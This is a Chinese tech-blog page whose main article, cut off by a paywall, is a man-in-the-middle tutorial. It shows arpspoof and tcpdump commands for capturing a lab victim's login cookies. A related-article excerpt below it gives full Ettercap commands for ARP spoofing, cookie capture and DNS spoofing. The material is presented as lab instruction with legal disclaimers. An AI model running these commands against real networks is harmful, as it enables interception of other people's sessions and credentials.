【MITM】登陆会话劫持

最新推荐文章于 2024-08-19 02:12:17 发布
最新推荐文章于 2024-08-19 02:12:17 发布
阅读量3.3k 收藏 5
点赞数 2
CC 4.0 BY-SA版权
分类专栏: 无线安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Nightsay/article/details/45733685
本文介绍了中间人攻击(MITM)的一种实施方式,通过Kali Linux进行ARP欺骗、数据包捕获和处理,利用Ferret和Hamster等工具对Windows 7靶机的QQ空间、新浪微博、百度登录会话进行劫持。强调此技术仅用于技术交流,禁止非法使用。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

中间人攻击(Man-in-the-MiddleAttack,简称“MITM攻击”)是一种“间接”的入侵攻击,这种攻击模式是通过各种技术手段将受入侵者控制的一台计算机虚拟放置在网络连接中的两台通信计算机之间,这台计算机就称为“中间人”。
本文所讨论的攻击方法仅供技术交流,禁止违法使用

工具

kali:

  • arpspoof:arp欺骗
  • tcpdump:dump数据包
  • Ferret:处理数据包
  • Hamster:提供web服务交互控制

拓扑

靶机:windows 7 (ip:192.168.1.114)
攻击机:kali 3.14(ip:192.168.1.118)
网关:192.168.1.1

攻击

网络连通

攻击机ping靶机,确保可以ping通
这里写图片描述

arp欺骗

arpspoof -i eth0 -t 192.168.1.1 192.168.1.114

这里写图片描述

抓取数据包

tcpdump -i eth0 -w cookie.cap

这里写图片描述

受害者登陆<

最低0.47元/天 解锁文章

200万优质内容无限畅学
11、网络嗅探、拒绝服务与会话劫持全解析
delta的博客
08-04 9
本文全面解析了网络安全中的三大威胁:网络嗅探、拒绝服务攻击(DoS/DDoS)和会话劫持。内容涵盖攻击原理、常见工具、实施方式及防范措施,涉及ARP欺骗、DNS投毒、交换网络嗅探、Smurf攻击、SYN洪水攻击、TCP序列预测等关键技术。同时介绍了BOT和BOTNET的工作机制,并提出了综合性的安全防御策略,如加密通信、身份验证、流量监控等,旨在帮助读者提升网络安全防护能力。
会话劫持攻击实战祥解
04-08
大家所说的入侵,都是针对一台主机,在获得管理员权限后,就很是得意;其实,真正的入侵是占领整个内部网络。针对内部网络的攻击方法比较多,但比较有效的方法非ARP欺骗、DNS欺骗莫属了。但是,不管使用什么技术,无非都是抓取目标的数据包,然后分析出敏感数据。如果目标内部采用的是共享式网络(采用HUB集线器连网),那只需要把网卡设置为“混杂模式”,挂上嗅探器(Sniffer),就能简听到你想得到的数据。如果是交换式网络(采用交换机连网),这样方法就行不通了,因为对于嗅探器,有三种网络环境是无法跨越的:“网桥”、“交换机”、“路由器”。可惜,对于ARP欺骗,交换式网络还是无能为力,如果我们借助ARP欺骗,在实现更高一层的“入侵手段”,从而真正的控制内部网络。这也就是本文要叙述的会话劫持攻击
Web安全实践(13)嗅探,arp欺骗,会话劫持与重放攻击(上)
weixin_33824363的博客
01-05 299
  本系列导航http://www.cnblogs.com/xuanhun/archive/2008/10/25/1319523.html 安全技术区http://space.cnblogs.com/group/group_detail.aspx?gid=100566  前言  (作者:玄魂) 嗅探,arp欺骗,会话劫持与重放攻击之间的关系可谓相辅相成,这次针对web安全把它们放在一起...
会话劫持安全攻击
allway2的博客
08-02 2613
可以通过对数据包进行加密来防止网络级别的劫持,这样劫持者就无法破译数据包标头,从而获取任何有助于欺骗的信息。TCP会话劫持是对受保护网络上的用户会话的安全攻击。会话劫持最常见的方法称为IP欺骗,攻击者使用源路由IP数据包将命令插入网络上两个节点之间的活动通信中,并将自己伪装成经过身份验证的用户之一。在传输模式下,只有数据包中发送的数据被加密,而在隧道模式下,数据包头和数据都被加密,因此限制性更强。另一种类型的会话劫持被称为中间人攻击,攻击者使用嗅探器可以观察设备之间的通信并收集传输的数据。...
windows会话劫持
dengzhasong7076的博客
03-21 371
更新一波: Jumbo师傅向我推荐了几个地址,发现还是能模拟(劫持?)用户会话然后创建进程,也就进而可以获取到其他会话挂载到3389的磁盘. 工具下载:https://github.com/l3m0n/pentest_tools/blob/master/%E5%86%85%E7%BD%91%E6%94%BB%E9%98%B2/%E8%BF%9C%E7%A8%8B%E8%BF%9E%E6...
什么是会话劫持攻击
m0_57836225的博客
08-19 881
例如,在用户登录了一个网站的情况下,攻击者通过诱使用户访问恶意网站或点击恶意链接,导致用户的浏览器在用户不知情的情况下向目标网站发送请求(如修改密码、转账等)。例如,当用户登录成功后,服务器创建一个 Session 并为其生成一个唯一的会话 ID,然后将这个会话 ID 以 Cookie 的形式发送给客户端,后续客户端的请求会自动携带这个 Cookie,服务器通过解析 Cookie 中的会话 ID 来识别用户的会话。2. Shiro:一个功能强大的 Java 安全框架,也能用于处理会话管理和防止会话劫持
ssh-mitm:ssh mitm服务器,用于安全审核,支持公钥身份验证,会话劫持和文件操作
03-19
中间(mitm)服务器中的人,用于安全审核,支持公钥身份验证,会话劫持和文件操作 给个星星! :star: 这使我有动力开发该工具。谢谢! 0.4.3中的新功能-2021-03-09 与dropbear ssh客户端的兼容性 特征 劫持和记录...
Web安全实践(13)嗅探,arp欺骗,会话劫持与重放攻击整理.pdf
11-18
会话劫持可以分为两种类型:中间人攻击(Man In The Middle,简称 MITM)和注射式攻击(Injection)。 中间人攻击需要使用 ARP 欺骗或 DNS 欺骗,将会话双方的通讯流暗中改变,而这种改变对于会话双方来说是完全...
TCP会话劫持攻击
热门推荐
qq_45162687的博客
06-18 1万+
TCP会话劫持攻击 【目的】 在本实验中,将在中间人攻击的基础上,进行TCP会话劫持攻击,通过实验实现 熟悉基于ARP欺骗的中间人攻击方式; 掌握TCP会话劫持原理。 【环境】 基于本书提供的实验环境,为了获得TCP会话序列号并避免ACK风暴,攻击节点Kali通过ARP欺骗成为中间人,从而通过截获TCP数据包,对SeedUbuntu和OWASP之间的TCP会话进行劫持。 【原理】...
APP帐号登陆风险:中间人劫持MITM)攻击
weixin_33851604的博客
07-06 474
2019独角兽企业重金招聘Python工程师标准>>> ...
利用Python绘制3D玫瑰花
07-27
Python具有强大的图像显示功能,借助它绘制自定义颜色的3D玫瑰花图像
会话劫持攻击实战
ElGamal的专栏
10-22 1381
前言通常,大家所说的入侵,都是针对一台主机,在获得管理员权限后,就很是得意;其实,真正的入侵是占领整个内部网络。针对内部网络的攻击方法比较多,但比较有效的方法非ARP欺骗、DNS欺骗莫属了。但是,不管使用什么技术,无非都是抓取目标的数据包,然后分析出敏感数据。如果目标内部采用的是共享式网络(采用HUB集线器连网),那只需要把网卡设置为"混杂模式",挂上嗅探器(Sniffer),就能简听到你想得到的
会话劫持 攻击:了解 和预防
学海无涯苦作舟的博客
03-24 772
每次您访问网站时,从登录到退出之间的时间称为“会话”。大多数用户每天都会发起数十个会话,而不会出现问题。但是,并非每次会议都是安全的,因为网络犯罪分子会找到理由和方法来接管他们。 尽管所谓的会话劫持攻击已经发生了多年,但随着越来越多的人在远程工作并依靠网站和应用程序来执行工作,人们对这种威胁有了新的认识。这种会议攻击的一种常见形式是接管视频会议。例如,联邦调查局(FBI)在2020年3月报告说,在马萨诸塞州的在线高中课堂上,一个身份不明的人拨入虚拟教室,“大声亵渎,然后大喊老师的家庭住址”。尽管像这样的视频
会话劫持攻击实战详解
拾贝人
11-02 1177
前言   通常,大家所说的入侵,都是针对一台主机,在获得管理员权限后,就很是得意;其实,真正的入侵是占领整个内部网络。针对内部网络的攻击方法比较多,但比较有效的方法非ARP欺骗、DNS欺骗莫属了。但是,不管使用什么技术,无非都是抓取目标的数据包,然后分析出敏感数据。如果目标内部采用的是共享式网络(采用HUB集线器连网),那只需要把网卡设置为“混杂模式”,挂上嗅探器(Sniffer),就能简
kali实现Cookie会话劫持
weixin_45971758的博客
02-28 1212
HTTP 会话cookie劫持,使用kali登录用户。
什么是会话劫持攻击,怎样防御会话劫持攻击
canduecho的专栏
06-03 1044
4. 巧取豪夺:攻击者通过身体力行的方法,如在公共场所窥视使用者的登录凭证信息,例如密码或 PIN 码等敏感信息,然后获取用户的 Cookie 或 Session ID 进行攻击。2. XSS 攻击:攻击者通过注入恶意脚本或链接,篡改网页内容,并使用户在不知情的情况下访问并提供敏感信息,攻击者可以通过这些信息获取到用户的 Session ID。3. 中间人攻击:攻击者通过 DNS 欺骗、ARP 欺骗等手段,欺骗用户访问假冒网站,并窃取用户的 Cookie 或 Session ID,然后进行会话劫持攻击。
使用SSHMitm中间人拦截SSH
单核CPU的小朋友的博客
04-02 4557
使用SSHMitm中间人拦截SSH 网络拓扑: 靶机:metasploitable2-linux 攻击机:kali-linux 访问者:backtrack5-linux Kali使用ettercap进行中间人攻击(arp欺骗): 本处使用ssh登陆远程服务器 但是kali没有抓到任何包 进行服务版本号扫描判断原因 发现版本号为 Openssh4.7,理论上是可以攻击的。但是由于采用了protocol 2版本,所有的信息都是加密的,这里我们采用arpspoof的方法进行中间人攻击来抓包验证。
Session攻击(会话劫持+固定)与防御
zhangge3663的博客
10-30 2073
1、简介 Session对于Web应用无疑是最重要的,也是最复杂的。对于web应用程序来说,加强安全性的第一条原则就是-不要信任来自客户端的数据,一定要进行数据验证以及过滤,才能再程序中使用,进而保存到数据层。然而,为了维持来自同一个用户的不同请求之间的状态,客户端必须要给服务器端发送一个唯一的身份标识符(Session ID)。很显然,这和前面提到的安全原则是矛盾的,但是没有办法,ht...
什么是会话劫持攻击以及如何防止会话劫持
allway2的博客
08-02 5547
会话固定是通过从各种来源识别会话ID进入用户计算机的最常见方式,例如在URL参数中找到会话ID,隐藏在表单中,保存在cookie中。这基本上取决于他们,他们可以将钱从受害者的账户转移到另一个版本,从众多的网上商店购物,窃取受害者的所有重要和秘密信息,等等。今天,会话ID是随机生成的,为用户提供了高度的安全性。攻击者将在不可见的情况下执行他们的活动,因此不会有迹象表明他们的计算机被操纵。此外,用户的计算机将从网站的安全层传递,这使得攻击者很容易渗透服务器并请求所需的数据。...
ettercap会话劫持及DNS欺骗心得
最新发布
06-09
### Ettercap在会话劫持和DNS欺骗中的使用方法和技巧 #### 一、Ettercap概述 Ettercap 是一款功能强大的网络嗅探工具,支持多种攻击方式,包括 ARP 欺骗、DNS 欺骗和会话劫持等[^1]。它通过中间人攻击(Man-in-the-Middle, MITM)技术实现对目标网络流量的拦截和篡改。 --- #### 二、会话劫持(Session Hijacking) 会话劫持是指攻击者通过某种手段获取用户的合法会话信息(如 Cookie 或 Session ID),从而冒充用户的身份进行操作。以下是使用 Ettercap 进行会话劫持的技术细节: 1. **环境准备** - 确保 Kali Linux 已安装 Ettercap 和 Apache2。 - 开启 IP 转发功能以避免断网攻击: ```bash echo 1 > /proc/sys/net/ipv4/ip_forward ``` - 启动 Apache2 服务用于模拟攻击服务器: ```bash service apache2 restart ``` 2. **配置 Ettercap** 编辑 Ettercap 配置文件以启用插件: ```bash sudo vi /etc/ettercap/etter.conf ``` 注释掉 `redir_command_on` 和 `redir_command_off` 的相关行,确保流量重定向正常工作[^1]。 3. **执行会话劫持命令** 使用以下命令启动 Ettercap 并进行 ARP 欺骗: ```bash ettercap -i eth0 -Tq -M arp:remote -P http_header /被攻击者IP// /网关IP// ``` 参数说明: - `-i eth0`:指定网卡。 - `-Tq`:文本模式和安静模式。 - `-M arp:remote`:执行远程 ARP 欺骗。 - `-P http_header`:启用 HTTP 头部分析插件,捕获敏感信息如 Cookies[^2]。 4. **捕获会话信息** 在 Ettercap 图形化界面中,选择目标主机并查看其会话数据包,提取关键的会话标识符(如 Cookie)[^1]。 --- #### 三、DNS欺骗(DNS Spoofing) DNS 欺骗是通过伪造 DNS 响应,将用户请求的目标域名解析为攻击者的 IP 地址,从而实现流量劫持[^3]。以下是使用 Ettercap 进行 DNS 欺骗的具体步骤: 1. **修改 Ettercap DNS 配置文件** 编辑 `/etc/ettercap/etter.dns` 文件,添加自定义的 DNS 映射规则: ```bash sudo vi /etc/ettercap/etter.dns ``` 添加以下内容: ``` www.target.com A <攻击者IP> *.target.com A <攻击者IP> ``` 将目标域名解析到攻击者的 IP 地址[^4]。 2. **启动 DNS 欺骗攻击** 使用以下命令启动 Ettercap 并加载 DNS 欺骗插件: ```bash ettercap -i eth0 -Tq -M arp:remote -P dns_spoof /被攻击者IP// /网关IP// ``` 参数说明与会话劫持类似,但额外启用了 `-P dns_spoof` 插件[^2]。 3. **验证效果** 让靶机访问目标域名(如 `www.target.com`),观察是否成功跳转到攻击者的服务器页面[^4]。 --- #### 四、注意事项 - **法律合规性**:仅在授权环境下进行测试,避免非法行为。 - **流量转发**:确保开启 IP 转发功能,否则可能导致目标主机断网。 - **日志记录**:Ettercap 会生成详细的日志文件,可用于后续分析。 --- ### 示例代码 以下是一个简单的 Python 脚本,用于自动化检测目标主机的 DNS 解析结果: ```python import socket def check_dns_resolution(domain, expected_ip): try: resolved_ip = socket.gethostbyname(domain) if resolved_ip == expected_ip: print(f"[+] {domain} resolves to {resolved_ip}") else: print(f"[-] {domain} resolves incorrectly to {resolved_ip}") except Exception as e: print(f"Error resolving {domain}: {e}") # 测试目标域名 check_dns_resolution("www.target.com", "192.168.1.100") ``` --- ####
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值